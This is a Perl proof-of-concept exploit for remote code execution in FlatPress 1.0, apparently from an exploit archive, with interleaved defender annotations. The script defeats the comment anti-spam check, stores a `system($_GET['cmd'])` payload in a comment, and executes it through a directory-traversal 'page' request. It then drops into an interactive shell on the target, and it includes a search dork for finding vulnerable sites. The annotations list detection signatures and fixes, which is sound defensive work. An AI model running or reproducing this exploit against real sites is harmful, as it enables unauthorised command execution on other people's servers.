Flatpress 1.0 - Remote Code Execution



  1. #!/usr/bin/perl
  2. # Exploit Title: Flatpress remore code execution PoC NULLday
  3. # Google Dork: This site is powered by FlatPress.
  4. # Date: 17/10/2013
  5. # Exploit Author: Wireghoul
  6. # Vendor Homepage: http://flatpress.org/home/
  7. # Software Link:
  8. http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# NOTE(review): this listing appears to have been line-wrapped before it was
# pasted.  The line above, and listing lines 17 and 52, read as continuations
# of the preceding comment, and as bare text they would not compile under
# Perl; a regex on listing lines 55-56 is likewise split.  Read the numbered
# listing as a transcript of the PoC rather than as a runnable file.
  9. # Version: v1.0
  10. #
  11. # Blended threat, executes code injected into comment
  12. # by loading comment as a page through directory traversal
  13. # Requires the inlinePHP plugin to be enabled.
# Defender's summary, from the header and the code further down: two
# weaknesses are chained.  A comment body is stored by the application and is
# later fetched as a page through a "../" traversal in the "page" parameter;
# the inlinePHP plugin then presumably evaluates the [exec]...[/exec] markers
# the comment carries.  Removing or disabling inlinePHP breaks the chain, as
# does rejecting "page" values that contain "..".  The stored comment is a
# persistent forensic artifact in the content tree.
  14. # Written by @Wireghoul - justanotherhacker.com
  15. #
  16. # This is for my peeps and the freaks in the front row -- Hilltop Hoods:
  17. Nosebleed section
  18. use strict;
  19. use warnings;
  20. use LWP::UserAgent;
  21. &banner;   # &-call syntax; banner and usage are defined further down the file
  22. &usage if (!$ARGV[0]);   # the single positional argument is the target base URL
  23. my $injid = 'Spl0ited'.int(rand(9999));   # marker used later to locate the posted comment; also a detection signature
  24. my $ua = LWP::UserAgent->new;
  25. $ua->timeout(10);
  26. $ua->env_proxy;   # picks up proxy settings from the environment
  27. $ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });   # relative path: tmp/ is expected to exist under the working directory -- verify
  28. sub banner {
# Print the tool banner to STDOUT.  Called once at startup via "&banner".
  29. print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
  30. print "=======================[ justanotherhacker.com]==\n";
  31. }
  32. sub usage {
# Print the usage line and terminate.  Reached when no URL argument is given;
# the bare "exit" exits with status 0, so a missing argument is not reported
# as a failure to the calling shell.
  33. print "Usage: $0 <url>\n";
  34. exit;
  35. }
  36. my $response =
  37. $ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
# Probe for the plugin file.  An HTTP success only shows the file is
# reachable, not that the plugin is enabled -- the message below says as
# much.  For defenders, a GET for this plugin path from an unfamiliar client
# is a cheap indicator worth logging.
  38. if (!$response->is_success) {
  39. print "[-] Inline PHP plugin not found at
  40. $ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
  41. } else {
  42. print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
  43. }
  44. # Prepare for exploitation, find entry + comment location
  45. $response = $ua->get($ARGV[0]);
  46. if ($response->is_success) {
  47. if ($response->decoded_content =~
  48. /(http.*?x=entry:entry.*?;comments:1#comments)/) {   # first "comments" link on the front page
  49. my $cmntlink = $1;
  50. print "[+] Found comment link: $cmntlink\n";
  51. my $aaspam = 0; # Can't be bothered solving easy captchas, just
  52. reload page until we get one we like
# The comment form's arithmetic challenge ("N plus M ?") is answered by the
# script itself; it keeps reloading until it sees that form.  Lesson for the
# application side: a trivially parseable arithmetic challenge is not an
# effective control against automated posting.
  53. while ($aaspam == 0) {
  54. $response = $ua->get($cmntlink);
  55. if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \?
  56. \(\*\)/) {
  57. $aaspam = $1+$2;
  58. print "[+] Defeated antispam $1 + $2 = $aaspam\n";
  59. } else {
  60. $response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
  61. print "[*] Unknown antispam: $1 ... retrying\n";
  62. }
  63. }
  64. # Post a comment
# The comment body carries the payload between SHELL / LLEHS markers; those
# markers are what the pseudo-shell below scrapes for when reading output.
# Detection: comment author names beginning "Spl0ited", or comment bodies
# containing "[exec]" or "SHELL", are direct signatures of this PoC.
  65. $response = $ua->post(
  66. $cmntlink."form",
  67. Content => {
  68. 'name' => $injid,
  69. 'email' => '',
  70. 'url' => '',
  71. 'aaspam' => $aaspam,
  72. 'content' =>
  73. "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
  74. 'submit' => 'Add',
  75. }
  76. );
  77. $response = $ua->get($cmntlink);
  78. # Find link to injected content, then execute psuedo shell in loop
  79. my @cmnts = split (/<li id="comment/, $response->decoded_content);   # one chunk per rendered comment
  80. my @injected = grep /$injid/, @cmnts;   # $injid is alphanumeric, so interpolating it into the pattern is safe here
  81. if ($injected[0] =~ /$injid/) {
  82. print "[+] Injection ($injid) successful\n";
  83. $injected[0] =~
  84. m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
  85. my
  86. $shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
# The traversal: the entry-id segments from the comment link are reused to
# build a "page=../../content/.../comments/comment..." value that points the
# page loader at the stored comment file instead of a static page.  This is
# the request pattern to alert on, and the input server-side validation of
# "page" should reject.  Nothing below removes the comment, so it remains on
# disk under that path after the session ends.
  87. print "[*] Dropping into shell, type exit to exit\n";
  88. my $line='';
  89. while (1) {
  90. print '$';
  91. $line=<STDIN>;
  92. if ($line =~ /^exit$/) { exit; };
  93. my $output=$ua->get("$shell&cmd=$line");   # each command is one more request carrying the traversal above
  94. $output->decoded_content =~ /SHELL(.*)LLEHS/ms;
  95. my $clean = $1; $clean =~ s/<br \/>//g;   # strip the <br /> tags the page adds to the echoed output
  96. print "$clean\n";
  97. }
  98. } else {
  99. print '[-] Unable to identify the injection point';
  100. }
  101. } else {
  102. print "[-] Comment link not found\n";
  103. }
  104. } else {
  105. die $response->status_line;   # front page not reachable: abort with the HTTP status
  106. }
